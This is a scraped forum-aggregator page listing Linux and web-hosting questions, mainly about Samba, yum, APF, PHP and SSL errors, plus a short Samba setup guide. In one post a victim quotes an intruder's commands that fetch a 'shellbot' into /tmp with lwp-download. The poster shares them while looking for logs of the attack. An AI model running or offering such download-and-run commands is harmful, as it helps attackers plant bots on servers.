Tracking Forums, Newsgroups, Maling Lists
Home Scripts Tutorials Tracker Forums
  Advanced Search
  HOME    TRACKER    Web Hosting


Advertisements:




SuperbHosting.net & Arvixe.com have generously sponsored dedicated servers and web hosting to ensure a reliable and scalable dedicated hosting solution for BigResource.com.







System Error 53 Samba


I was wondering if anyone has came across this error when dealing with SAMBA.

[url]is the error and the 'fix'.

I have about 50users that can connect just fine, running sp2 (xp pro) but some other users that have xp home or media center can't. There running sp2 and they still get the above error. In the article i need to contact MS for the hotfix...

Any quick fixes other then maybe changing then workgroup?

Netbios is enabled

All can ping the server.

Z drive is OK for use (IE there PC doesnt have a Z drive in use)


View Complete Thread with Replies

Sponsored Links:

Related Forum Messages:
Parser Error Message: Could Not Load File Or Assembly System
I am getting this error for one of my website. This site is working fine on the old server from which it has been migrated:

=============================================================
Server Error in '/' Application.
--------------------------------------------------------------------------------

Configuration Error
Description: An error occurred during the processing of a configuration file required to service this request. Please review the specific error details below and modify your configuration file appropriately.
Parser Error Message: Could not load file or assembly 'System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. The system cannot find the file specified. (c:Inetpubvhosts<domain.com>httpdocsweb.config line 59)
Source Error:
Line 57: <add verb="GET" path="CrystalImageHandler.aspx" type="CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions.Web, Version=10.2.3600.0, Culture=neutral, PublicKeyToken=692fbea5521e1304"/></httpHandlers>
Line 58: <httpModules>
Line 59: <add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
Line 60: </httpModules>
Line 61: </system.web>
Source File: c:Inetpubvhosts<domain.com>httpdocsweb.config Line: 59
--------------------------------------------------------------------------------

Version Information: Microsoft .NET Framework Version:2.0.50727.3053; ASP.NET Version:2.0.50727.3053
=============================================================

I am attaching the web.config file as attachment. Can anyone tell me how do I fix this.

View Replies!   View Related
Torrentflux B4rt Script :: Pipe Error: Too Many Open Files In System
i have Made a VPs on my Own dedicated Server Which i use to run TorrentFlux for Personal Use.
I am facing a few problems and dont know where to askf or help.

when i start more than about 12, i get errors in SSh (if i llogin) or th4e Apache Restarts killing all the Transfers.

I ahve 2 Gb Ram, Dual Core CPU.

the Error Via SSh is:
sh: pipe error: Too many open files in system

and i ahve attached a Errors Log From Apache.

i am a Noob in Servers so i ahve Lxadmin Contorl Panel Installed and the Log is generated by it.

View Replies!   View Related
SAMBA
I'm currently trying out SAMBA, and having a few last minute issues:

I got both of my centos servers to run samba fine, the mount from serverA to serverB is great... the only problem is that it can't DIR/LS the mounted/shared folder for browsing and viewing. Here is my current smb.conf:

[global]
netbiosname = superpix
security = USER
password level = 4
os level = 64
domain master = yes
local master = yes
prefered master = yes
browsable = yes
writable = yes
locking = no
case sensitive = no
default case = lower
preserve case = yes
short preserve case = no
encrypt passwords = Yes
workgroup = superpix

[homes]
read only = no
browseable = no

[shared]
path = /san
interfaces = eth1 lo
hosts deny = ALL
hosts allow = 10.222.0.
browseable = yes
write list =root, admin
create mask = 0644
directory mask = 0777
public = yes
valid users = admin

I'm not sure what I'm doing wrong... but I can access the files in that folder fine from another server, i just can list/dir the darn thing.

View Replies!   View Related
SAMBA Speed Up
how can we ridiculously speed up SAMBA connections?

View Replies!   View Related
SAMBA+LDAP Connection
I'm trying to setup a PDC Login server with SAMBA+LDAP (in separate servers).

How can I test if SAMBA is trying to login properly into the LDAP server?

View Replies!   View Related
Getting Winbind To Work With Samba
Im running a redhat server with samba version 3.0.25b..

I dont think it even has winbind, and I need it to join the windows active domain so people can log in and access files etc..

ive searched everywhere to find a nice wget ftp url so i could get the rpm and just install the thing..but is nowhere to be found. I tried installing some random version of the winbind that I COULD find...but no luck, wouldnt work.

View Replies!   View Related
SAMBA/LDAP Integration
I'm struggling hard to integrate a group of windows boxes to authenticate with a Linux samba/ldap server (with personal mapped drives as well).
I get stuck in this error:

root@LittleCode:/usr/share/smbldap-configure# smbldap-useradd -a -m moquist
Error looking for next uid in cn=NextFreeUnixId,dc=activespace,dc=local:value does not conform to assertion syntax at /usr/share/perl5/smbldap_tools.pm line 1071.
root@LittleCode:/usr/share/smbldap-configure#

View Replies!   View Related
Samba Installation: Libtalloc.so.1
I am trying to install samba-3.2.1 from source.

To give a short background, I download the src zip and unpack it to local.

go into the file and run a
./autogen.sh
./configure --with-winbind --prefix=/usr/local/samba --with-smbwrapper --with-pam --with-pam-smbpass
make
make install

When I try to run
/usr/local/samba/sbin/smbd -D
I get this message
Error while loading shared libraries : libtalloc.so.1 : cannot open shared object file: no such file or directory

I searched online and found this solution, which sounds like they know what they are talking about..only problem is..I dont!

[url]

View Replies!   View Related
ProFTPd To Windows Over SAMBA
We've got a Linux box running ProFTPd reaches a Windows box over SAMBA. This works very well but when the client has a great number of files, the FTP Windows-based FTP clients they use don't always give accurate directory listings (if any at all). I know there's some bug in the way SAMBA works with Windows File Sharing but I don't know what the magic file number is that, when reached, prevents a proper directory listing. Does anyone know what this magic number is or if there's an available, tested fix for this?

View Replies!   View Related
Map Network Drive By Using Samba
This is a little samba guide from my own experiences of how to map a network drive under windows 2000 to a Linux server. I am not technical expert and this guide is the result from my trail and error.

What's Samba?

Samba allows Linux computers to share files and printers across a network connection. By using its SMB protocol, your Linux box can appear in Windows Network Neighborhood or My Network Places just like any other windows machine. You can share files this way, as well as printers. By using samba on my home network, for example, my Windows machines have access to a printer directly hooked up to my Linux box, and my Linux box has access to a printer directly hooked up to one of my Windows machines. In addition, everyone can access everyone else's shared files. You can see how samba can be very useful if you have a network of both Windows as well as Linux machines.

My OSs

Windows 2000
RHEL 3 (Redhat Enterprise Linus)

My goal

Map a network drive to Linux servers, so that I can access the Linux files under windows 2000.

Installation

Most Linux should have Samba already installed. But if it hasn't install, you can find at in http://rpmfind.net or using up2date command "up2date -i samba". You can also get it at http://www.samba.org

Then you can install it by tying the following Command:

Install:

rpm -i samba.rpm

Upgrade:

rpm -U samba.rpm

Configuration

Samba conf file is located at /etc/samba/smb.conf, allows you to specify which resources on the Linux machine you wish to share and who they can be accessed by.

Samba provide a full version conf if it's fresh install. But most of the times, we don't really need all of these options. So I provide my own conf here, which is rather simple, but it makes things work.

[global]
workgroup = WORKGROUP
server string = LinuxBOX
hosts allow = your_windows_machine_IP
log file = /var/log/samba/%m.log
security = user
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192

[Downloads]
comment = Downloads
path = /path_to_your_sharefolder
browseable = yes
writable = yes
public = yes
read only = no

[homes]
comment = My Home Directory
browseable = yes
writable = yes
public = yes
read only = no

[printers]
path = /var/spool/samba
public = yes
guest ok = yes
printable = yes
browseable = yes
writable = yes
read only = no

Just replace workgroup to your windows workgroup name, your_windows_machine_IP and /path_to_your_sharefolder. If you don't need printers sharing, you don't need to have printer section.

Setup Samba Users

Since we're using user level security, we need to setup samba users. This can be easily done by using Webmin. You can go to Server --> Samba --> Convert Unix users to Samba users, you can just covert all your existing Linux users and set them password under the icon "Edit Samba users and passwords" later.

If you don't use webmin, you can also type the following command:

cat /etc/passwd | mksmbpasswd.sh > /etc/samba/smbpasswd

smbpasswd username

Replace username with each of your user's usernames. You will then be prompted to enter a password for this user account.

Samba Service

Now, it's time to start your samba server:

service smb start
service smb stop
service smb restart

Once the computer is restarted or shutdown, the samba service won't start up again in next boot up. I use webmin to make it startup at boot time.

Windows 2000 Configuration

1. Under windows 2000, you can got to windows explorer --> Tools --> map a network drive
2. select drive letter
3. enter the path (e.g. your_server_ipDownloads)
4. click connect using different user name
5. enter your samba usernaem and password that you just set
6. You can connect to your Linux machine now!

This method work for me. If there is any correction or improvements, please let me know.

View Replies!   View Related
Samba Chown Operation Not Permitted
I'm currently running SAMBA on one my linux servers, and wanting to connect to it from another linux server.

1. Do I need to install SAMBA on the connecting server (client-side)?

2. I can see/mount the SAMBA folder just fine, I can delete,make,etc. The only thing I can't do on the client side is change ownership of a file or folder... even if I'm logged in as root.

View Replies!   View Related
Preserving The Same Permissions With Samba Mount
how to preserve permissions the same 1:1 after mounting the remote resource with samba mount cause currectly the permissions are changing.

View Replies!   View Related
Samba :: Isolate Different Users In A Directory And Subdirectories
I am trying to isolate different users in a directory and subdirectories.

Case:-

Directory A --> Sub A
--> Sub B
--> Sub C

I want everybody to be able to access "Directory A" but limited access to "Sub A", "Sub B" and "Sub C". How can i achieve that?

Currently, all users that are able to access "Directory A" can go in "Sub A", "Sub B" and "Sub C".

View Replies!   View Related
Samba :: Tree Connect Failed: NT_STATUS_BAD_NETWORK_NAME
I have configured samba on my server but when i access shared directory but i can't its gives error.......

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.25b-1.el5_1.4]
Server not using user level security and no password supplied.
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

View Replies!   View Related
Samba Server :: Can Linux And Windows Exist On The Same Server?
I have a linux server for a video sharring site

The video encoder that I prefer to use will only work in a windows enviorment

The windows server would pass off the converted video to the Linux server.

Will a Samba server for Linux allow a Linux machine to connect and share files with a Windows machine work for this application.

Although it's probably a dumb question but can Linux and Windows exist on the same server?

View Replies!   View Related
CentOs(Yum) Error :: Error: Cannot Find A Valid Baseurl For Repo: Update
yum -y groupinstall kde
Loading "priorities" plugin
Setting up Group Process
Setting up repositories
Cannot find a valid baseurl for repo: update
Error: Cannot find a valid baseurl for repo: update

what is this? what ever i try to install i get this weird error..

View Replies!   View Related
Unable To Parse Zone: Error While Parsing Zonedata For Xyz.com: Syntax Error
While clicking on "Edit DNS" in WHM

I am getting this error

Unable to parse zone: Error while parsing zonedata for xyz.com: syntax error, line 25 ...propagated at /usr/local/cpanel/Cpanel/CPAN/Net/DNS/ZoneFile/Fast.pm line 142.

View Replies!   View Related
Error APF :: Error Fetching Interface Information: Device Not Found
im still getting the following error

Code:
root@main [/tmp/apf-9.7-1]# ./install.sh
Installing APF 9.7-1: eth0: error fetching interface information: Device not found
Completed.

Installation Details:
Install path: /etc/apf/
Config path: /etc/apf/conf.apf
Executable path: /usr/local/sbin/apf

Other Details:
eth0: error fetching interface information: Device not found
cp: cannot stat `/etc/apf.bk.last/vnet/*.rules': No such file or directory
Imported options from 9.7-1 to 9.7-1.
Note: Please review /etc/apf/conf.apf for consistency, install default backed up to /etc/apf/conf.apf.orig
my host has said
Code:
edit the apf.conf file to venet0:0 instead of eth0
which ive done and im still getting the error, Ive pasted my current conf.apf config below

Code:
#!/bin/sh
#
# APF 9.7 [apf@r-fx.org]
# Copyright (C) 1999-2007, R-fx Networks <proj@r-fx.org>
# Copyright (C) 2007, Ryan MacDonald <ryan@r-fx.org>
# This program may be freely redistributed under the terms of the GNU GPL
#
# NOTE: This file should be edited with word/line wrapping off,
# if your using pico/nano please start it with the -w switch
# (e.g: pico -w filename)
# NOTE: All options in this file are integer values unless otherwise
# indicated. This means value of 0 = disabled and 1 = enabled.

##
# [Main]
##
# !!! Do not leave set to (1) !!!
# When set to enabled; 5 minute cronjob is set to stop the firewall. Set
# this off (0) when firewall is determined to be operating as desired.
DEVEL_MODE="1"

# The installation path of APF; this can be changed but it is not recommended.
INSTALL_PATH="/etc/apf"

# Untrusted Network interface(s); all traffic on defined interface will be
# subject to all firewall rules. This should be your internet exposed
# interfaces. Only one interface is accepted for each value.
IFACE_IN="venet0"
IFACE_OUT="venet0"

# Trusted Network interface(s); all traffic on defined interface(s) will by-pass
# ALL firewall rules, format is white space or comma separated list.
IFACE_TRUSTED=""

# This option will allow for all status events to be displayed in real time on
# the console as you use the firewall. Typically, APF used to operate silent
# with all logging piped to $LOG_APF. The use of this option will not disable
# the standard log file displayed by apf --status but rather compliment it.
SET_VERBOSE="1"

# The fast load feature makes use of the iptables-save/restore facilities to do
# a snapshot save of the current firewall rules on an APF stop then when APF is
# instructed to start again it will restore the snapshot. This feature allows
# APF to load hundreds of rules back into the firewall without the need to
# regenerate every firewall entry.
# Note: a) if system uptime is below 5 minutes, the snapshot is expired
# b) if snapshot age exceeds 12 hours, the snapshot is expired
# c) if conf or a .rule has changed since last load, snapshot is expired
# d) if it is your first run of APF since install, snapshot is generated
# - an expired snapshot means APF will do a full start rule-by-rule
SET_FASTLOAD="0"

View Replies!   View Related
Email Error - Error Number 0x800CCC79 Server Response 451 Temporary Local
As the title says, 1 of the accounts on my server is getting the following error message - error number 0x800CCC79 server response 451 temporary local problem -

Yet other accounts on the server are sending and recieving fine?

what would cause this error? Its not tempory as its been 48 hours

View Replies!   View Related
FTP Error :: Error:Failed To Retrieve Directory Listing
I got an error in ftp.

Command:MLSD
Response:150 Accepted data connection
Response:226-ASCII
Response:226-Options: -a -l
Response:226 24 matches total
Error:Connection timed out
Error:Failed to retrieve directory listing

View Replies!   View Related
How To Generate PHP Error.log Files In The Directory Of Error
unable to get any php5 error logs

Here are my settings in the /etc/php5/apache2/php.ini file:

display_errors = On
display_startup_errors = Off
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
error_log = /var/log/php5/error.log

However unfortunately I never see any error log being generated in the /var/log/php5/error.log file?

Also with my shared hosting site one thing which I noticed was, due to some configurations set by them, the error.log used to generate in the folder where the error occured. This is a cool thing which they used to do, but I just dont understand how did they do that.

View Replies!   View Related
Fatal Error: Internal Optimizer Error: Can't Translate Opcode
I upgraded my PHP to 5.2.4 ang changed server API from Apache to CGI, and now a site doesnt load anymore...

It gives this error message: Fatal error: Internal Optimizer error: can't translate opcode 60 (JMP_NO_CTOR), please contact Zend support in /home/vrock/public_html/rwf/rwengine.lib on line 0

PHP Version 5.2.4
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2007, by Zend Technologies
with Zend Optimizer v3.3.0, Copyright (c) 1998-2007, by Zend Technologies

View Replies!   View Related
Error On Yum Update :: Error: Missing Dependency: Perl(Crypt:asswdMD5) Is Needed By Package Syslinux
--> Populating transaction set with selected packages. Please wait.
---> Package cadaver.i386 0:0.22.5-1.el5.rf set to be updated
---> Package mtr.i386 2:0.72-1.el5.rf set to be updated
---> Package rsync.i386 0:3.0.2-1.el5.rf set to be updated
---> Package nmap.i386 2:4.20-1.el5.rf set to be updated
---> Package lftp.i386 0:3.7.1-1.el5.rf set to be updated
---> Package syslinux.i386 0:3.63-1.el5.rf set to be updated
---> Package dkms.noarch 0:2.0.19-2.el5.rf set to be updated
---> Package subversion.i386 0:1.4.6-0.1.el5.rf set to be updated
--> Running transaction check
--> Processing Dependency: perl(Crypt:asswdMD5) for package: syslinux
--> Finished Dependency Resolution
Error: Missing Dependency: perl(Crypt:asswdMD5) is needed by package syslinux

when I run yum update

View Replies!   View Related
Yum Error :: Error:cannot Retrieve Repository Metadata
I am using fedora 7 and when i fire "yum localinstall dovecot-*" it gives error.
Could not retrieve mirrorlist [url]Error was [Errno4] IOError:< urlopen Error (110,'connection timed out')> Error:cannot retrieve repository metadata (Repomd.xml) for repository:fedora

i have checked all the setting but nothing.

View Replies!   View Related
APF Error :: Iptables: Unknown Error 4294967295
Now im having a prob in my vps.I am gettin an error when I restart my vps.

iptables: Unknown error 4294967295
iptables: Unknown error 4294967295
iptables: Unknown error 4294967295
iptables: Unknown error 4294967295

View Replies!   View Related
The Following Error Occurred: [code=RESOURCE_RECLAIMED] Internal Error. Try Again.
The following error occurred: [code=RESOURCE_RECLAIMED] Internal error. Try again.

from 4 hour to know thats what i get when i go to my site
ftp not work

i host with hostmonster also his forum give me this error i open ticket not reply to know is this from me or from him?

View Replies!   View Related
The Error Detected Is: Http Error:Http_client.No_reply
A lot of downtime recently, The following url is down:
after i restart the apache, it will back to normal,

[url]

the error detected is:

Http error:Http_client.No_reply
Error was detected at 2007-05-22 04:17:08

View Replies!   View Related
SSL Library Error: 218734605 Error
I could not get Apache to restart. It kept failing. Narrowed it down to this error:

[Tue Jan 22 16:09:03 2008] [error] SSL Library Error: 218734605 error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1 lib

Removed the SSL portion out of my virtual host file and Apache restarted. But if I put the SSL portion back in, Apache fails.

All paths in http.conf and ssl.conf files are correct. And the SSL Cert is valid.

This is Centos box with Apache2 with OpenSSL 0.9.7.

Any suggestions on why this happened out of the blue and how to fix it?

View Replies!   View Related
Slow System
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

View Replies!   View Related
Invoicing System
Is there any billing software/scripts that enable customer to view their invoice without login?

View Replies!   View Related
KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?

View Replies!   View Related
System Cleaning
Is there anything like System cleaning in VPS (Linux with apache) ? I need to do system cleaning so that my space and performance can increase.

Is there anything like that in Linux?

View Replies!   View Related
System Warning
Ive been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. Im hoping someone here can point me in the right direction. Im running Windows 2003 Web Edition.

Quote:

Event Type:Warning
Event Source:LSASRV
Event Category:SPNEGO (Negotiator)
Event ID:40960
Date:3/20/2007
Time:7:45:33 PM
User:N/A
Computer:B02S08MR
Description:
The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request.
(0xc000005e)".

For more information, see Help and Support Center at
[url]
Data:
0000: 5e 00 00 c0

View Replies!   View Related
System Logs
I keep receiving hacking attempts from someone accessing my server and running commands like these:

Code:
hubberfix

sh -c cd /tmp;lwp-download [url]
shellbot

I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.

Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.

View Replies!   View Related
Which Operating System
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron.

CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware

View Replies!   View Related
Whole System Backup
I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc.

I dont want to see that some day something crash - and I will must start over with everything.

What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc.

I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.

View Replies!   View Related
Linux System
I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?

Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc.

how to download tar file using Terminal,

View Replies!   View Related
Recommended File System
I have a dedicated server running Linux CentsOS.

The default setup of my file system is:

/dev/sda1 450GB

tmpfs 2GB

/usr/tmpDSK 485 MB

My Disk size is 500GB

View Replies!   View Related
Secure Virtuozzo System
Does someone know a good article for secure a virtuozzo node/host server?

View Replies!   View Related
System Clock Off Continuously
One of our server's system clock seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off.

Any ideas what could be causing this? It's uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running.

Right now we have a cronjob running ntpdate every few minutes as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.

View Replies!   View Related
Perl System Mail
I am trying to write a perl script, it send's mail to a user i used system(mail -s test) and also send some messages using this.

but my issue is i receive mail with html code like <br> and so..

how to get a plain mail using this system command.

View Replies!   View Related
Which Ticket System Does The Hostgator Use?
is there anybody knows which ticket system does the Hostgator use? Or that is theirs unique system?

View Replies!   View Related
Server Became Read Only System
I had a linux server (CentOs 5, mysql5, php5, directadmin). I had problems with apache few days ago, that's why i hire sys. admin who tweak the system (install the PAE kernel), and some more configurations, and during last 7-8 days server work w/o any downtime (before this server had 1-2 downtimes per day-> OOM killer.)

Now i had only ssh access (emails, directadmin access - give "wrong password" answer). As told my sys.admin It became read only system.

I cann't even reboot system

Quote:

[root@server sa]# reboot
reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2)

such few commands work, the most commands that i know don't work

Quote:

[root@server ~]# ls -la
ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory

View Replies!   View Related
HostMonster.com System Loads
I have a shared host with them for a few months which the disk usage for home/backup is usually around 85-95%. Right now I am experiencing very slow download speed. What about yours?

Server Load 2.92 (8 cpus)
Memory Used 42.6 %
Swap Used 0.01 %
Disk /dev/sdc1 (/home) 91 %
Disk /dev/sdd1 (/backup) 90 %
Disk /dev/sde1 (/backup/cpbackup/weekly) 43 %
Disk /dev/ram0 (/ramdisk) 24 %
Disk /dev/sdb1 (/) 22 %

View Replies!   View Related
System Health Monitoring
I am wondering if anyone knows of any good system monitors for Linux. I will be installing several web and database servers at a branch office and would like to receive stats like system temperature, cpu load, memory usage, etc. Basically something to tell to warn me in the event of a hardware error. I am looking something with an easy-to-use web interface and ability to generate reports.

View Replies!   View Related
VZPP - System Usage
I have a VPS with 512mb guaranteed memory.

From VZPP, my Resource Capacity(System Usage)is using >50% even when I don't have any active sites at all!

Support staff trying to convince me is normal as apache, cpanel etc are using resources.

Yes, I agreed they use up resources. But at >50%?

What will happen if I just have an active site, wouldn't it hit 100% and I have to upgrade immediately for more resources?

I think is more of nodes or some setup issues then "is normal".

What is normal "system usage" for new VPS with no website on it.

View Replies!   View Related
Apache Hogs The System
Getting the following in my log

Quote:

apache 1994 0.0 0.0 2776 1020 ? S 15:02 0:00 sh -c /usr/bin/identify -format %w###%h###%m###%n###%r###%z "/tmp/php
apache 1995 23.3 0.0 0 0 ? D 15:02 1:03 [identify]

This is a good case.. normally though it is like this:

Quote:

apache 2864 0.0 0.0 3064 1020 ? S 15:08 0:00 sh -c /usr/bin/identify -format %w###%h###%m###%n###%r###%z "/tmp/php
apache 2865 39.8 0.3 19944 12612 ? D 15:08 0:26 /usr/bin/identify -format %w###%h###%m###%n###%r###%z /tmp/php0SNeMT

View Replies!   View Related
Central Monitoring System
i have some server at a data center but it dont provide any remote reboot port and any BW monitoring and etc..

i have to run my own monitoring system,and i need a bit more info for this.
which software is required for this and which hardware base i need?

View Replies!   View Related
Allocate System Ram
I have a VPS acct with Plesk, am peaking out my system ram at 128mb. Host said to allocate ,ore = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (non that are too big). Most of them are wordpress sites.

Would caching help? Not sure where to look to find this out.

View Replies!   View Related
Phone System Checking
I'm thinking to implement a solution for our VOIP system so that automatic calls should be done several times a day and to check that someone is responding or that it's ringing.

We are using AsteriskWin32 for now and for our needs it's working great.

View Replies!   View Related
Changing System Date
We have a server located in USA. We have hosted an application for online booking of travel tickets. The customer wanted to change the system date to IST instead of EDT which we did. Now, if we try to change the system date to a future date in order to test our application, the date automatically resets to the current date. This happens only if we have the timezone as IST. If we change the system date to EDT, then after changing the system date, it does not reset automatically. It changes only if we modify it manually. However, if we change the timezone to IST, then the system date resets automatically back to the current date. We have stopped the W32 Time service and also blocked the port 123. We have also disabled the automatic synchronization with the internet time server.

View Replies!   View Related
Setting Up RAID System
I've never loaded Linux onto a RAID array before,

I have an Adaptec 2105S card, with 3 x SCSI HDD's attached, in a RAID5 setup. When I boot the Cent OS Server 4.4 CD, it says I don't have any hard drives attached. I am then prompted to select a device driver, but it does not show up in the list.

The options in the list are:
- Adaptec AACRAID (aacraid)
- Adaptec AHA-152x (aha152x)
- Adaptec AHA-2740, 28xx, 29xx, 39xx (aic7xxx)
- Adaptec Aic79xx SCSI Host Bus Adapter driver (aic79xx)
- Adaptec SAS/SATA Host Bus Adapter driver (adp94xx)

It says if I have a driver disk, hit F2. The problem is that I don't have a driver disk.

The manual tells me to visit [url]for drivers, but it's not offline. When I go to the download section for the card [url]the only *nix option, is SuSE.

View Replies!   View Related
File System Check
i got this message from my provider after asking for a reboot:

Quote:

Your server had an EXT3 FS error scrolling across the screen.

I rebooted and the server mounted clean, but you may end up needing a file system check (FSCK).

I want to do that myself so i can schedule the downtime after midnight, what are the procedures to fix this erros to avoid the need to reboot the server often

am using CENTOS with cpanel & whm

View Replies!   View Related
Copyright © 2005-08 www.BigResource.com, All rights reserved